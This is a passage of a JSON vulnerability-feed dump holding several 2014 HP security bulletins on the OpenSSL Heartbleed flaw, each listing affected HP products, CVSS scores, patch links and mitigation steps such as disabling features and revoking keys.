operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 - Initial release\r\nVersion:2 (rev.2) - 25 April 2014 - Added links to Windows and Linux patches\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = 
HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNae+UACgkQ4B86/C0qfVnanACfYri6ZfqCI5DCQ9BYtTFafBiY\r\nQz8AoJCnza5IXEegJ6CngyhCGfn4SGJI\r\n=t5NX\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03017 rev.2 - HP Software Connect-IT running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30500", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30500", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272594\r\n\r\nSUPPORT COMMUNICATION - 
SECURITY BULLETIN\r\n\r\nDocument ID: c04272594\r\nVersion: 1\r\n\r\nHPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer\r\nSoftware running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Virtual\r\nConnect Firmware Smart Components installer software running OpenSSL. This is\r\nthe OpenSSL vulnerability known as "Heartbleed" which could be exploited\r\nremotely resulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101549\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Virtual Connect Firmware Smart Components installer impacted products and\r\nversions\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU) 1.9.0 for Linux\r\nand Windows\r\n\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: 
HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Virtual Connect\r\nFirmware Smart Components Installer software in the following updates and/or\r\nHP Security Bulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.10B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_da108a1f80f644f79d3dcc8b98%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.20B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_6c1bcbd3c5ae485cb936818973%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU)\r\n HPSBMU03023\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04264271\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30525", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30525", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236102\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236102\r\nVersion: 1\r\n\r\nHPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB\r\nBrowser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner,\r\nPerformance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-11\r\nLast Updated: 2014-04-11\r\n\r\nPotential Security Impact: Remote disclosure of 
information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101499)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Product\r\n Impacted HP Product Versions\r\n Notes\r\n\r\nHP Service Manager\r\n v9.32, v9.33\r\n\r\nHP Asset Manager\r\n v9.40, v9.40 CSC\r\n\r\nHP UCMDB Browser\r\n\r\n APR enabled on Tomcat includes an affected OpenSSL version\r\n\r\nHP CIT (ConnectIT)\r\n v9.52, v9.53\r\n\r\nHP Executive Scorecard\r\n v9.40, v9.41\r\n\r\nHP Server Automation\r\n v10.00, v10.01\r\n\r\nHP Diagnostics\r\n v9.23, v9.23 IP1\r\n\r\nHP LoadRunner\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nHP Performance Center\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nImpacted Versions table\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP Software is working to address this vulnerability for all affected 
product\r\nversions. HP Software will release product specific security bulletins for\r\neach impacted product. Each bulletin will include a patch and/or mitigation\r\nguideline. HP will update this bulletin with references to security bulletins\r\nfor each product in the impacted versions table.\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 April 2014 Initial release\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30471", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30471", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260637\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260637\r\nVersion: 1\r\n\r\nHPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreEver ESL\r\nG3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL.\r\nThis 
is the OpenSSL vulnerability known as "Heartbleed" which could be\r\nexploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101513\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version1.0.1f for\r\nthe following firmware versions:\r\n\r\n671H_GS00601\r\n665H_GS12501\r\n663H_GS04601\r\n\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in\r\n655H firmware versions:\r\n\r\n655H_GS10201\r\n\r\nHP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nfirmware versions of HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives. This bulletin will be revised when the software updates\r\nare released.\r\n\r\nHP recommends the following mitigation or workaround that can reduce the\r\nlikelihood of an attacker being able to exploit the "Heartbleed"\r\nvulnerability for the HP StoreEver ESL G3 Tape Library and the StoreEver\r\nEnterprise Library LTO-6 Tape Drives:\r\n\r\nThe following configuration options that allow access to the Heartbeat\r\nfunction in the vulnerable versions of OpenSSL are not enabled by default.\r\nVerify that the following options are "disabled" using the Tape Library GUI:\r\n\r\nSecure SMI-S\r\nCVTL User\r\n\r\nNote: disabling these features blocks the vulnerable OpenSSL function in both\r\nthe ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape\r\nDrives. 
The basic functionality of the library is not affected by these\r\nconfiguration changes and SSL access to the user interface is not blocked by\r\nthese settings.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30507", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04307186\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04307186\r\nVersion: 1\r\n\r\nHPSBMU03044 rev.1 - HP Business Process Monitor, running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in 
this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-21\r\nLast Updated: 2014-05-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Business\r\nProcess Monitor running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101580\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Business Process Monitor 9.23, 9.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve this\r\nvulnerability:\r\n\r\nBusiness Process Monitor 9.23, download LoadRunner 11.52, patch 2:\r\n\r\nLoad Generator SA for Windows:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LRLG_00051\r\n\r\nLoad Generator SA for Linux:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LR_03304\r\n\r\nBusiness Process Monitor 9.24, download LoadRunner 12.00, patch 1:\r\n\r\nLoad Generator SA for Windows:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LRLG_00052\r\n\r\nLoad Generator SA for Linux:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LR_03333\r\n\r\nHP recommends following our security guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nNOTE: Bulletin 
Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html.\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 May 2014 Initial release\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-30T00:00:00", "title": "[security bulletin] HPSBMU03044 rev.1 - HP Business Process Monitor, running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-30T00:00:00", "id": "SECURITYVULNS:DOC:30776", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30776", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04255796\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04255796\r\nVersion: 1\r\n\r\nHPSBMU03012 rev.1 - HP Insight Management VCEM Web Client SDK (VCEMSDK)\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-18\r\nLast Updated: 2014-04-18\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nManagement VCEM Web Client SDK (VCEMSDK) running OpenSSL.This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, 
SSRT101504\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Management VCEM Web Client SDK (VCEMSDK) 7.2, 7.2.2, and 7.3\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Management VCEM Web Client SDK (VCEMSDK). This\r\nbulletin will be revised when the software updates are released.\r\n\r\nUntil the software updates are available, HP recommends limiting programs\r\nlinked with HP VCEMSDK to use on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 18 April 2014 Initial release\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03012 rev.1 - HP Insight Management VCEM Web Client SDK (VCEMSDK) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30511", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30511", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04267749\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04267749\r\nVersion: 1\r\n\r\nHPSBMU03024 rev.1 - HP Insight Control Server Deployment on Linux and Windows\r\nrunning OpenSSL with System Management Homepage and Systems Insight Manager,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP System\r\nManagement Homepage (SMH) running on Linux and Windows and HP Systems Insight\r\nManager (SIM), components of HP Insight Control server 
deployment. This is\r\nthe OpenSSL vulnerability known as "Heartbleed" which could be exploited\r\nremotely resulting in disclosure of information.\r\n\r\nInsight Control server deployment packages HP System Management Homepage\r\n(SMH) and HP Systems Insight Manager (SIM) and can deploy them through the\r\nbelow list of items. This bulletin will give you the information needed to\r\nupdate your HP Insight Control server deployment solution.\r\n\r\nInstall HP Management Agents for Windows x86/x64\r\nInstall HP Management Agents for RHEL 5 x64\r\nInstall HP Management Agents for RHEL 6 x64\r\nInstall HP Management Agents for SLES 10 x64\r\nInstall HP Management Agents for SLES 11 x64\r\n\r\nReferences: CVE-2014-0160 (SSRT101538)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Control server deployment. This bulletin may be\r\nrevised. 
It is recommended that customers take the following approaches\r\ndepending on the version of HP Insight Control server deployment:\r\n\r\nTo address the vulnerability in an initial installation of HP Insight Control\r\nserver deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2, only follow steps 1\r\nthrough 3 of the following procedure, before initiating an operating\r\nsystem deployment.\r\n\r\nTo address the vulnerability in a previous installation of HP Insight Control\r\nserver deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2, follow all steps in the\r\nfollowing procedure.\r\n\r\nDelete the "smhamd64-*.exe/smhx86-*.exe" from Component Copy Location listed\r\nin the following table, rows 1, 2, 3, 4.\r\nDelete the affected "hpsmh-7.*.rpm" from Component Copy Location listed in the\r\nfollowing table, row 5.\r\nIn sequence, perform the steps from left to right in the following table.\r\nFirst, download components from Download Link. Second, rename the component\r\nas suggested in Rename to. Third, copy the component to the location\r\nsuggested in Component Copy Location.\r\nTable Row Number\r\n Download Link\r\n Rename to\r\n Component Copy Location\r\n\r\n1\r\n http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52\r\n smhx86-cp023242.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2003\r\n\r\n2\r\n http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37\r\n smhamd64-cp023243.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2003\r\n\r\n3\r\n http://www.hp.com/swpublishing/MTX-2e19c856f0e84e20a14c63ecd0\r\n smhamd64-cp023240.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2008\r\n\r\n4\r\n http://www.hp.com/swpublishing/MTX-41199f68c1144acb84a5798bf0\r\n smhx86-cp023239.exe\r\n \\express\hpfeatures\hpagents-ws\components\Win2008\r\n\r\n5\r\n http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37\r\n Do not rename the downloaded component for this step.\r\n 
\\express\hpfeatures\hpagents-sles11-x64\components\r\n\\express\hpfeatures\hpagents-sles10-x64\components\r\n\\express\hpfeatures\hpagents-rhel5-x64\components\r\n\\express\hpfeatures\hpagents-rhel6-x64\components\r\n\r\nTable 1\r\n\r\nInitiate Install HP Management Agents for SLES 11 x64 on targets running\r\nSLES11 x64.\r\nInitiate Install HP Management Agents for SLES 10 x64 on targets running\r\nSLES10 x64.\r\nInitiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL\r\n6 x64.\r\nInitiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL\r\n5 x64.\r\nInitiate Install HP Management Agents for Windows x86/x64 on targets running\r\nWindows.\r\nRefer to the System Management Homepage security bulletin HPSBMU02998 for\r\nsteps to take after SMH is updated to a version that is not impacted by\r\nHeartbleed, such as changing SMH passwords, and revoking SMH certificates if\r\nimported into HP Systems Insight Manager (two-way trust feature).\r\n\r\nIf you have HP Systems Insight Manager versions v7.3 or v7.3.1 installed,\r\nrefer to security bulletin HPSBMU03022\r\n\r\nRelated security bulletins:\r\n\r\nFor System Management Homepage please see Security bulletin HPSBMU02998\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239372\r\n\r\nFor Systems Insight Manager please see Security bulletin HPSBMU03022\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04263236\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP nor\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental, special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
